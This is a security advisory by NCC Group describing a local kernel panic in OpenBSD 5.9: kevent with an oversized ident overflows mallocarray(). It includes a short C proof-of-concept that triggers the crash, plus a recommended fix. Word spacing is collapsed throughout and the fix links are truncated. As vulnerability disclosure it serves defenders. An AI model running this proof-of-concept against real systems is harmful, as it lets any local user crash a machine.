|  
 #ifdef BUG_WRITEUP //--------------------------------------------------- 
 kevent with large ident can lead to a panic 
  
 Impact: 
 Any logged inuser can use kevent to panic the kernel. 
  
 Description: 
 When processing a kevent system call, kqueue_register() iscalled 
 foreach of the changes inthe user-provided change list. When 
 processing changes with a filter of EVFILT_READ, kqueue_register() 
 creates a newknote, attaches the user-provided kevent (the change) 
 to it, and calls knote_attach(). This function resizes an internal
 fdp->fd_knlist based on the value stored inkn->kn_id (which is
 really kn->kn_kevent->ident). This field isfrom the user-provided 
 kn->kn_kevent value and can be arbitrary. The relevant code is: 
  
 if(fdp->fd_knlistsize <= kn->kn_id) { 
 size = fdp->fd_knlistsize; 
 while(size <= kn->kn_id) 
 size += KQEXTENT; 
 list = mallocarray(size, sizeof(structklist), M_TEMP, 
 M_WAITOK); 
  
 If the original ident value isoverly large, the value of "size"will 
 be correspondingly large, and can trigger an assertion inmallocarray(). 
 This can be abused by any user to cause a kernel panic. 
  
 Reproduction: 
 Run the attached kevent_panic.c program. It will cause a panic such as
 "panic: mallocarray: overflow 18446744071562067968 * 8". (Here the 
 value 18446744071562067968 isffff.ffff.8000.0000 and was caused 
 by sign-extension of the "int size"variable when passing it into 
 the "size_t nmemb"argument of mallocarra()). NCC Group was 
 able to reproduce thisissue on OpenBSD 5.9 release running amd64. 
  
 Recommendation: 
 Validate the ident field of items inthe change list. Return 
 an error when adding a change with an overly large ident field. 
 This can be done inknote_attach() or earlier inkqueue_register() 
 or sys_kevent(). 
  
 Reported: 2016-07-13 
 Fixed: http:
 http:
 http:
  
 #endif // BUG_WRITEUP --------------------------------------------------- 
  
  
 #include <stdio.h> 
 #include <string.h> 
 #include <stdlib.h> 
 #include <sys/types.h> 
 #include <sys/event.h> 
  
 voidxperror(intcond, char*msg) 
 { 
 if(cond) { 
 perror(msg); 
 exit(1); 
 } 
 } 
  
 intmain(intargc, char**argv) 
 { 
 structkevent chlist[1]; 
 intx, kq; 
  
 kq = kqueue(); 
 xperror(kq == -1, "kqueue"); 
  
 memset(chlist, 0, 1 * sizeofchlist[0]); 
 chlist[0].ident = 0x20000000000000; 
 chlist[0].filter = EVFILT_READ; 
 chlist[0].flags = EV_ADD; 
 x = kevent(kq, chlist, 1, 0, 0, 0); 
 xperror(x == -1, "kevent"); 
 printf("no crash!\n"); 
 return0; 
 } 
  
  
 
 |